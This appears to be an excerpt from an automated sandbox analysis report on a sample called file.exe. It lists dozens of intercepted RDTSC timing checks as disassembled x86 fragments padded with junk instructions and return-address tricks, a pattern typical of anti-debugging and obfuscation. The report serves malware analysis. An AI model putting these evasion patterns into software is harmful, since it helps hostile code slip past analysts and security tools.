                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224C95 second address: 1224CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77D6h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224CB0 second address: 1224CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F39A52A2E63h 0x00000009 jp 00007F39A52A2E56h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224CCD second address: 1224CE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F39A52A77CEh 0x00000010 jp 00007F39A52A77C6h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122511C second address: 122512C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F39A52A2E56h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12160B4 second address: 12160B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1227C6B second address: 1227C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1227C6F second address: 1227C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1227C75 second address: 1227C8F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F39A52A2E58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F39A52A2E58h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1227D10 second address: 1227D15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1227D15 second address: 1227D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1227D24 second address: 1227D36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1227D36 second address: 1227D7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b jmp 00007F39A52A2E68h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 mov ecx, dword ptr [ebp+122D3AE6h] 0x00000019 pop ecx 0x0000001a push 740535BDh 0x0000001f pushad 0x00000020 push ecx 0x00000021 push eax 0x00000022 pop eax 0x00000023 pop ecx 0x00000024 je 00007F39A52A2E5Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1227D7E second address: 1227E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 7405353Dh 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F39A52A77C8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov esi, 494E1400h 0x0000002b cmc 0x0000002c sub dword ptr [ebp+122D2AFAh], edx 0x00000032 push 00000003h 0x00000034 call 00007F39A52A77D7h 0x00000039 mov edx, dword ptr [ebp+122D17E8h] 0x0000003f pop edi 0x00000040 push 00000000h 0x00000042 mov dword ptr [ebp+122D1800h], ebx 0x00000048 push 00000003h 0x0000004a push BB796F9Ch 0x0000004f pushad 0x00000050 pushad 0x00000051 push eax 0x00000052 pop eax 0x00000053 jmp 00007F39A52A77D5h 0x00000058 popad 0x00000059 pushad 0x0000005a push edi 0x0000005b pop edi 0x0000005c pushad 0x0000005d popad 0x0000005e popad 0x0000005f popad 0x00000060 add dword ptr [esp], 04869064h 0x00000067 mov dx, 1BB1h 0x0000006b lea ebx, dword ptr [ebp+12459B92h] 0x00000071 mov esi, 5AB0FF93h 0x00000076 push eax 0x00000077 jbe 00007F39A52A77CEh 0x0000007d push ecx 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1227E53 second address: 1227F03 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F39A52A2E58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F39A52A2E62h 0x00000011 jmp 00007F39A52A2E65h 0x00000016 popad 0x00000017 nop 0x00000018 jg 00007F39A52A2E5Ch 0x0000001e push 00000000h 0x00000020 sub cx, 6C27h 0x00000025 push 42A11B84h 0x0000002a push edi 0x0000002b push esi 0x0000002c jmp 00007F39A52A2E66h 0x00000031 pop esi 0x00000032 pop edi 0x00000033 xor dword ptr [esp], 42A11B04h 0x0000003a mov dword ptr [ebp+122D3108h], edi 0x00000040 push 00000003h 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007F39A52A2E58h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 00000016h 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c push 00000000h 0x0000005e mov ecx, dword ptr [ebp+122D2485h] 0x00000064 push 00000003h 0x00000066 mov ecx, dword ptr [ebp+122D3A06h] 0x0000006c push 8BD36425h 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 push esi 0x00000075 pop esi 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1227F03 second address: 1227F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1227F07 second address: 1227F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007F39A52A2E56h 0x0000000d jmp 00007F39A52A2E5Dh 0x00000012 popad 0x00000013 popad 0x00000014 xor dword ptr [esp], 4BD36425h 0x0000001b adc dl, 00000029h 0x0000001e lea ebx, dword ptr [ebp+12459B9Bh] 0x00000024 jng 00007F39A52A2E5Ch 0x0000002a sub edx, 72C6C152h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F39A52A2E62h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1227FF7 second address: 122808A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 xor dword ptr [esp], 27A43B1Ah 0x0000000e call 00007F39A52A77D9h 0x00000013 mov dx, EDADh 0x00000017 pop edx 0x00000018 push 00000003h 0x0000001a mov ecx, dword ptr [ebp+122D3B4Ah] 0x00000020 push 00000000h 0x00000022 jng 00007F39A52A77CFh 0x00000028 pushad 0x00000029 clc 0x0000002a add edi, 562BB630h 0x00000030 popad 0x00000031 add esi, 23836840h 0x00000037 push 00000003h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007F39A52A77C8h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 00000018h 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 mov dword ptr [ebp+122D27BCh], ebx 0x00000059 call 00007F39A52A77C9h 0x0000005e push ecx 0x0000005f push ecx 0x00000060 jl 00007F39A52A77C6h 0x00000066 pop ecx 0x00000067 pop ecx 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c pushad 0x0000006d popad 0x0000006e ja 00007F39A52A77C6h 0x00000074 popad 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122808A second address: 12280A4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F39A52A2E58h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jbe 00007F39A52A2E71h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12280A4 second address: 12280A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12280A8 second address: 12280ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d jnc 00007F39A52A2E56h 0x00000013 jmp 00007F39A52A2E69h 0x00000018 popad 0x00000019 push ecx 0x0000001a push esi 0x0000001b pop esi 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12280ED second address: 12280F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12280F1 second address: 1228156 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F39A52A2E58h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 and edx, dword ptr [ebp+122D1C86h] 0x00000028 mov dword ptr [ebp+122D24BCh], ecx 0x0000002e lea ebx, dword ptr [ebp+12459BA6h] 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F39A52A2E58h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e mov edi, 715A3F84h 0x00000053 push eax 0x00000054 pushad 0x00000055 je 00007F39A52A2E58h 0x0000005b pushad 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124747C second address: 1247482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247482 second address: 124748C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12475F7 second address: 1247608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77CDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247608 second address: 124762C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F39A52A2E56h 0x0000000e jmp 00007F39A52A2E66h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124779D second address: 12477A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12477A3 second address: 12477BD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F39A52A2E56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F39A52A2E5Bh 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12477BD second address: 12477D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77CFh 0x00000009 pop ecx 0x0000000a popad 0x0000000b push edi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247A33 second address: 1247A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F39A52A2E5Ah 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247D6F second address: 1247D76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247FC8 second address: 1247FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247FCC second address: 1248002 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F39A52A77F8h 0x0000000e pushad 0x0000000f jmp 00007F39A52A77D8h 0x00000014 jnc 00007F39A52A77C6h 0x0000001a popad 0x0000001b jl 00007F39A52A77D2h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1248002 second address: 1248008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1248307 second address: 124830C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124830C second address: 1248312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1248312 second address: 1248316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1248316 second address: 124831A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1248980 second address: 1248984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1248984 second address: 12489A2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F39A52A2E62h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jns 00007F39A52A2E56h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1248BF6 second address: 1248C69 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F39A52A77C6h 0x00000008 jng 00007F39A52A77C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F39A52A77D2h 0x00000015 jc 00007F39A52A77DFh 0x0000001b jmp 00007F39A52A77D9h 0x00000020 jl 00007F39A52A77E2h 0x00000026 jmp 00007F39A52A77CEh 0x0000002b jmp 00007F39A52A77CEh 0x00000030 popad 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 jbe 00007F39A52A77C6h 0x0000003a ja 00007F39A52A77C6h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1248C69 second address: 1248C76 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F39A52A2E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1248C76 second address: 1248C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1248DE8 second address: 1248E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 jmp 00007F39A52A2E5Ch 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F39A52A2E5Ah 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124C28B second address: 124C28F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124C55A second address: 124C55E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124C55E second address: 124C562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D833 second address: 124D84F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E62h 0x00000007 jne 00007F39A52A2E56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212B8C second address: 1212BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F39A52A77CDh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212BA1 second address: 1212BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F39A52A2E56h 0x0000000a jl 00007F39A52A2E56h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212BB2 second address: 1212BB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212BB8 second address: 1212BBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212BBE second address: 1212BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F39A52A77CEh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120DA6F second address: 120DA8F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F39A52A2E64h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125670B second address: 125672A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 js 00007F39A52A77C6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnl 00007F39A52A77CAh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125672A second address: 125672F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125672F second address: 1256735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125686D second address: 125688A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F39A52A2E63h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1256B5D second address: 1256B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F39A52A77C6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F39A52A77CBh 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 jnp 00007F39A52A77C6h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1256B7F second address: 1256B84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1256E01 second address: 1256E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F39A52A77C6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F39A52A77C6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1256E14 second address: 1256E1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259055 second address: 1259059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259059 second address: 1259062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259062 second address: 1259096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77D9h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F39A52A77CFh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259605 second address: 1259609 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259D18 second address: 1259D23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F39A52A77C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259EB4 second address: 1259EBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259F86 second address: 1259F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125A06F second address: 125A073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125A44E second address: 125A452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125A452 second address: 125A458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125A458 second address: 125A4C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F39A52A77C8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D1843h], ebx 0x0000002b call 00007F39A52A77D0h 0x00000030 add si, A124h 0x00000035 pop esi 0x00000036 mov edi, dword ptr [ebp+1245BA2Ch] 0x0000003c xchg eax, ebx 0x0000003d jmp 00007F39A52A77D8h 0x00000042 push eax 0x00000043 pushad 0x00000044 push edi 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B3F4 second address: 125B3FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F39A52A2E56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B3FE second address: 125B402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B402 second address: 125B47D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F39A52A2E58h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 or esi, dword ptr [ebp+12457686h] 0x0000002b push 00000000h 0x0000002d sub dword ptr [ebp+124844C6h], edi 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007F39A52A2E58h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f mov esi, dword ptr [ebp+1245AD8Dh] 0x00000055 xchg eax, ebx 0x00000056 pushad 0x00000057 jmp 00007F39A52A2E61h 0x0000005c pushad 0x0000005d jnl 00007F39A52A2E56h 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
